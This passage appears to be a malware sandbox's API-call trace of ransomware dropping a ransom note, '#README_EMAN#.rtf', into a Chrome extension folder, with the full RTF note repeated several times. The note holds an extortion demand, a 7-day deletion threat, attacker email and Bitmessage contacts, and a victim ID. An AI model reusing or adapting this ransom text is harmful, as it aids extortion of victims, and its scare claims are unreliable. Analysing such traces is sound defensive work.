n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.114] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.115] CloseHandle (hObject=0x2e8) returned 1 [0292.115] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0292.115] GetLastError () returned 0x2 [0292.115] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.117] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, 